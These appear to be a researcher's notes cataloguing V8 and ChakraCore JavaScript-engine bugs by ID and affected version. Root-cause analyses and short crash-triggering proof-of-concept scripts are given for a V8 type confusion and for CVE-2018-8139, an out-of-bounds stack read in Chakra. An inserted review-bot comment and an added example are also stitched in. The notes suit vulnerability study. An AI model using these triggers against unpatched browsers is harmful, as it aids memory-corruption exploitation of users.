Vulnerabilities from Chrome

Chrome

Bugs:715582

6.0.92 and below

  • note
    Related to AST traversal and visiting; rather unusual, flagging it for later.

Bugs:732169

6.1.131 and below

CVE-2017-5115/Bugs:744584

6.2.0 and below

Bugs:746946

Bugs:752149

6.2.170 and below

Bugs:757199

6.2.363 and below

Bugs:765433

Bugs:762874

6.3.97 and below

Bugs:772420

6.4.32 and below

Bugs:776677

6.4.91 and below

Bugs:784533

6.4.289 and below

Bugs:788539

6.4.376 and below

Bugs:787910

6.4.363 and below

Bugs:791245

6.1.75-6.5.6

Bugs:791953

Bugs:794394

5.7.447-6.5.67

Bugs:794822

6.5.71 and below

Bugs:797596

6.5.107 and below

Bugs:794405/794359

Bugs:799263

6.4.66-6.5.143

Bugs:797130

Bugs:801627

Here's a snippet of NodeProperties::InferReceiverMaps.
case IrOpcode::kJSCreate: {
  if (IsSame(receiver, effect)) {
    HeapObjectMatcher mtarget(GetValueInput(effect, 0));
    HeapObjectMatcher mnewtarget(GetValueInput(effect, 1));
    if (mtarget.HasValue() && mnewtarget.HasValue()) {
      Handle<JSFunction> original_constructor =
          Handle<JSFunction>::cast(mnewtarget.Value());

      if (original_constructor->has_initial_map()) {
        Handle<Map> initial_map(original_constructor->initial_map());
        if (initial_map->constructor_or_backpointer() ==
            *mtarget.Value()) {
          *maps_return = ZoneHandleSet<Map>(initial_map);
          return result;
        }
      }
    }
    // We reached the allocation of the {receiver}.
    return kNoReceiverMaps;
  }
  break;
}

“mnewtarget” is expected to be a constructor which also can be of type JSBoundFunction. But “mnewtarget” is always cast to JSFunction which leads to type confusion.

PoC:
// Flags: --allow-natives-syntax --enable_slow_asserts

class Base {
  constructor() {
    this.x = 1;
  }
}

class Derived extends Base {
  constructor() {
    // JSCreate emitted I guess.
    super();
  }
}

let bound = Object.bind();
Reflect.construct(Derived, [], bound); // Feed a bound function as new.target to the profiler, so HeapObjectMatcher can find it.

%OptimizeFunctionOnNextCall(Derived);

new Derived();

Bugs:802060

6.6.136 and below

  • note
    Don't get this one, lol

Bugs:802333

6.6.85 and below

Bugs:803022

6.6.45 and below

Bug: chromium:804801

6.6.54 and below

Bugs:804837

6.6.45 and below

Bugs:818144

https://bugs.chromium.org/p/chromium/issues/detail?id=818144
No patch found

Bugs:818811

https://bugs.chromium.org/p/chromium/issues/detail?id=818811
No patch found

Bugs:819311

6.7.26 and below

Bugs:820984

Bug:822284

6.5.245-6.7.86

Bugs:829679

6.7.245 and below

Edge

Track updates:

https://github.com/Microsoft/ChakraCore/wiki/Roadmap

v1.8.3

CVE-2018-8139

  • Microsoft Edge: Chakra: A bug in BoundFunction::NewInstance
    https://bugs.chromium.org/p/project-zero/issues/detail?id=1569

  • Patch
    https://github.com/Microsoft/ChakraCore/commit/ee5dfabc51728f97f6d69e89c88af088251b6b76

  • PoC

    function func() {
      new.target.x; // [0] -> new.target sits after the regular arguments; accessing .x treats it as a JS object. When I reproduced the PoC, new.target happened to be a null pointer, so reading Null.x triggered the crash.
    }

    let bound = func.bind({}, 1); // -> boundFunction -> boundArgs[i]

    Reflect.construct(bound, []);
  • Syntax
    Reflect.construct
    https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Reference/Global_Objects/Reflect/construct

    Reflect.construct(target, argumentsList[, newTarget])

    Without the optional newTarget argument, this behaves exactly like new target(...args).
    Passing newTarget exists to serve a rare need in some frameworks: the instance is initialized by target, but the result must behave as an instance of newTarget.

  • root cause
    The root cause is that BoundFunction::NewInstance does not take the CallFlags_ExtraArg flag into account when calling the Target function, so it does not copy the ExtraArg (which here is newTarget).
    The patch shows that, after the fix, this flag is taken into account.

    +           if (args.HasExtraArg())
    + {
    + newValues[index++] = args.Values[argCount];
    + }
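    Review bot: the copy under `if (args.HasExtraArg())` writes `newValues[index++] = args.Values[argCount]`, one slot past the regular arguments, but the fragment does not show where `newValues` is allocated; the reviewer should confirm its size accounts for the extra slot when the flag is set, otherwise this write would itself run off the end of the new argument array.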

But the CallFlags_NewTarget flag remains set,
so when the Target function is actually called later, InterpreterStackFrame::OP_LdNewTarget reads 8 bytes out of bounds from the Args array on the stack.

  • info leak
    Can the data on the stack be controlled?
  • how to find?
    Flag handling, a logic bug; found by auditing?
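To make the newTarget semantics described under Syntax concrete, and to show the bound-function-as-new.target case that both the V8 InferReceiverMaps bug and this Chakra bug revolve around, here is an added example (not from the original notes and not PoC code): it records which constructor body runs, which prototype the result gets, and what new.target is when newTarget is a bound function.

```javascript
// Added example (not from the original notes): what Reflect.construct's optional
// newTarget changes. Base records new.target so the caller can inspect it.
class Base {
  constructor(v) {
    this.x = v;                      // initialised by target's constructor body
    this.seenNewTarget = new.target; // whatever was passed as newTarget
  }
}
class Other {}

// No newTarget: identical to `new Base(1)`.
function plainConstruct() {
  return Reflect.construct(Base, [1]);
}

// With newTarget: Base's body runs (x is set), but the prototype is taken
// from Other.prototype and new.target inside Base is Other.
function constructWithNewTarget() {
  return Reflect.construct(Base, [2], Other);
}

// With a bound function as newTarget: a bound function has no own
// "prototype" property, so GetPrototypeFromConstructor falls back to the
// realm's Object.prototype, while new.target is still the bound function.
function constructWithBoundNewTarget() {
  const bound = Other.bind(null);
  const obj = Reflect.construct(Base, [3], bound);
  return { obj, bound };
}

// Summarise the observable facts about a constructed object.
function describe(obj) {
  return {
    x: obj.x,
    protoIsBase: Object.getPrototypeOf(obj) === Base.prototype,
    protoIsOther: Object.getPrototypeOf(obj) === Other.prototype,
    protoIsObject: Object.getPrototypeOf(obj) === Object.prototype,
    newTargetHasPrototype: Object.prototype.hasOwnProperty.call(obj.seenNewTarget, 'prototype'),
  };
}

console.log(describe(plainConstruct()));
console.log(describe(constructWithNewTarget()));
console.log(describe(constructWithBoundNewTarget().obj));
```

The third case is the one an engine must handle specially: new.target is a constructor, yet it carries no initial map or prototype, which is exactly the assumption the InferReceiverMaps cast above gets wrong.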

v1.8.4

CVE-2018-8229